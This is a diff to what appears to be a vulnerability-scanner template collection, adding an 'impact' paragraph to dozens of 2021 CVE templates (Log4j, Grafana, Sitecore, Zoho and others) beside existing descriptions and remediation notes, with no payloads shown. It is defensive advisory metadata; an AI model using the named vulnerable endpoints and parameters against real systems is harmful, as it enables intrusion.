diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 1058575ca9..259dcce225 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of SAP Knowledge Warehouse (>=7.5.1) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 1ee17577c8..3ced4ea073 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device. reference: diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index 219a8d0528..86bf7ec1e0 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml 
@@ -5,6 +5,8 @@ info: author: rschio severity: high description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index e3fdf71b0f..515bd53900 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. reference: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index a881d09707..f7a1704ac3 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite. reference: diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index e4adce3814..8ad682664e 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -5,6 +5,8 @@ info: author: compr00t severity: medium description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index bafb5e3a38..ebdb55cbbd 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 58549fb59a..8a2ad4e719 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index bac0122b2c..f3a0142e41 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, data theft, or defacement. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 5f49502e4e..8c4cb3aad3 100644 
--- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | D-Link DIR-615 devices with firmware 20.06 are susceptible to unauthorized access. An attacker can access the WAN configuration page wan.htm without authentication, which can lead to disclosure of WAN settings, data modification, and/or other unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to the router, potentially compromising the network and exposing sensitive information. remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability and ensure strong and unique passwords are set for router administration. reference: diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 3126a0e8a6..626b46a799 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index bf9a1eb071..54ada33607 100644 --- a/http/cves/2021/CVE-2021-42667.yaml 
+++ b/http/cves/2021/CVE-2021-42667.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update to a non-vulnerable version of the Online Event Booking and Reservation System. reference: diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index eb95710aca..9f162fcd5d 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TOTOLINK EX1200T 4.1.2cu.5215 is susceptible to authentication bypass. An attacker can bypass login by sending a specific request through formLoginAuth.htm, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the device, potentially leading to further compromise of the network. remediation: | Apply the latest firmware update provided by TOTOLINK to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 725e9dc8ee..e27793fc3d 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml 
@@ -5,6 +5,8 @@ info: author: ajaysenr severity: medium description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Fortinet FortiMail. reference: diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index e749adfb06..2c053432e9 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access and control over the build pipelines, potentially resulting in the execution of arbitrary code or unauthorized modifications. remediation: Upgrade to version v21.3.0. or later. reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index d42bd75e26..ab72aaa058 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to upload malicious files to the server and execute arbitrary code. remediation: | Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 24744107e7..ae973296c2 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution. remediation: | Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions. reference: diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 14e29c8236..2e1ef5fce0 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml 
@@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: high description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. + impact: | + This vulnerability can result in unauthorized access to sensitive files and directories, as well as the execution of arbitrary code on the affected system. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index fd773aac97..4622d2c1e7 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Simple Client Management System 1.0. reference: diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index f34adf5155..761a3a8bb5 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Atmail to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index e751aa88c5..1b2a12c730 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 20849c0556..1bbb93c118 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to a patched version of kkFileview v4.0.1 or later, or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index a01b177a6b..320143a0f0 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file. reference: - https://github.com/AK-blank/CVE-2021-43778 diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index e43ae9bc7a..785aad54c6 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml 
@@ -5,6 +5,8 @@ info: author: z0ne,dhiyaneshDk,j4vaovo severity: high description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index 2d37d7beb5..76983d1dea 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to version 4.0.12 or later. reference: - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index b77b770e1d..98d256e0b6 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml 
@@ -5,6 +5,8 @@ info: author: Adam Crosser,gy741 severity: critical description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine ServiceDesk Plus. reference: diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 0d8694c816..a88334158f 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -6,6 +6,8 @@ info: severity: high description: | There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive data exposure. remediation: | Upgrade Caucho Resin to a version higher than 4.0.56 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 855ec3fe3b..080c2ebaba 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send crafted requests from the server, potentially leading to unauthorized access to internal resources or network scanning. remediation: | Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 5a4ba1fa97..3f6d472f03 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Reprise License Manager. remediation: | Apply the latest security patch or upgrade to a patched version of Reprise License Manager to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 9ba276dd26..7817befeb6 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system. remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). reference: - https://logging.apache.org/log4j/2.x/security.html diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index 7ad88c0cc6..7b2bebb77b 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -5,6 +5,8 @@ info: author: furkansayim,xShuden severity: critical description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database, modify data, or execute arbitrary SQL commands. remediation: Upgrade to version 8.1.1 or higher. reference: - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328 diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index d63a143025..54bfd80c3b 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can gain unauthorized access to the Apache Superset application. remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index 987e9a5441..bff8d6b55c 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -5,6 +5,8 @@ info: author: Adam Crosser severity: critical description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. reference: - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 67a1c35462..64428c8c4e 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + impact: | + This vulnerability can lead to phishing attacks, where users are tricked into visiting malicious websites and disclosing sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Open Redirect vulnerability in the Host Authorization Middleware. reference: diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 94a032de69..0904fa7e6c 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -5,6 +5,8 @@ info: author: duty_1g,phyr3wall,Tirtha severity: critical description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). + impact: | + Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system. remediation: | Apply the latest security patches provided by Ivanti to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 6a1f6ef0d6..cc5bd60753 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml 
@@ -5,6 +5,8 @@ info: author: danielmofer severity: medium description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.) + impact: | + An attacker can use the gathered usernames for further attacks, such as brute-forcing passwords or launching targeted phishing campaigns. remediation: | Apply the vendor-supplied patch or upgrade to the latest version of Thinfinity VirtualUI to mitigate the user enumeration vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 7fb73137e1..448b57d08c 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -5,6 +5,8 @@ info: author: Momen Eldawakhly,Evan Rubinstein severity: high description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in HD-Network Realtime Monitoring System 2.0. reference: diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 6db7ac0c03..dd20037519 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml 
@@ -5,6 +5,8 @@ info: author: ImNightmaree severity: critical description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Log4j2. reference: diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index a89aff9d9e..bfefc49cbf 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -5,6 +5,8 @@ info: author: danielmofer severity: critical description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential remote code execution. remediation: | Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 2f7f22882e..d2b89bc5ac 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml 
@@ -5,6 +5,8 @@ info: author: Mr-xn severity: critical description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication. + impact: | + An attacker can gain unauthorized access to the API, potentially leading to data breaches or unauthorized actions. remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard. reference: - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/ diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 71a3dc4b78..fb01acffb2 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 8a660c5aa5..3ae34addb7 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Reprise License Manager 14.2. reference: diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 3a2a3fb9a9..6bb45ecbf8 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + impact: | + Successful exploitation of this vulnerability could result in unauthorized accessand data leakage. remediation: | Apply the latest security patch or update to a version that addresses the arbitrary file upload vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 003f874041..482e6b350b 100644 --- a/http/cves/2021/CVE-2021-45967.yaml 